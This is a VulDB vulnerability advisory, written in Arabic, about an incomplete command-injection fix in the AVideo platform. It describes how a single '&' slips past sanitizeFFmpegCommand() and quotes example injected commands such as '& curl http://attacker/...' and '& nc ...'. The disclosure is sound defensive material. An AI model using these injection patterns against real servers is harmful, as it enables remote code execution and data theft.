CVE-2026-55173 in AVideoالمعلومات

الملخص

بحسب VulDB • 17/07/2026

تُعد WWBN AVideo منصة فيديو مفتوحة المصدر. لا تزال الإصدارات 29.0 وما دونها عرضة لهجوم حقن أوامر النظام (OS command injection) لأن الإصلاح الخاص بـ CVE-2026-33482 كان غير مكتمل ولا يزال يفشل في تحييد الرمز & المفرد (مشغل الخلفية في غلاف shell). أفاد تقرير CVE-2026-33482 بأن الدالة sanitizeFFmpegCommand() (في الملف plugin/API/standAlone/functions.php) فشلت في إزالة استبدال الأوامر بصيغة $(...)، مما سمح بحقن أوامر النظام عند نقطة الاستقبال execAsync() باستخدام sh -c. أضاف الإصلاح (الالتزام 25c8ab90) الأحرف $, (, ), {, }, \n, \r إلى فئة أحرف القائمة الممنوعة وأمر str_replace('&&', '', ...)، لكنه لم يأخذ في الاعتبار الرمز & المفرد. يبني ملف ffmpeg.json.php الأمر من خلال _decryptString(getInput('codeToExecEncrypted')). هذا هو نموذج التهديد نفسه الذي قبلته النصيحة الأمنية الأصلية ("يمكن للمهاجم الذي يستطيع صياغة حمولة مشفرة صحيحة تحقيق تنفيذ أوامر عشوائية على خادم التشفير المستقل") ونفس أساس تقييم CVSS (AV:N/AC:H/PR:N). يمكن تسلسل عدة مفصولة بـ & (مثل: تنزيل + تنفيذ). تم حظر الحمائل القائمة على إعادة التوجيه بواسطة إزالة الرمز >، لكن تنفيذ الأوامر (على سبيل المثال: & curl http://attacker/..., & nc ...، إسقاط/تشغيل ملف) لم يتم حظره. تمت معالجة هذه المشكلة من خلال هذا الالتزام: https://github.com/WWBN/AVideo/commit/c1cfa2bea8a351a1d07f5758f82887403e3abf1f.

Several companies clearly confirm that VulDB is the primary source for best vulnerability data.

مسؤول

GitHub M

حجز

16/06/2026

إفشاء

17/07/2026

الاعتدال

تمت الموافقة

إدخال

VDB-379647

EPSS

0.00000

KEV

لا

النشاطات

منخفض

المصادر

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!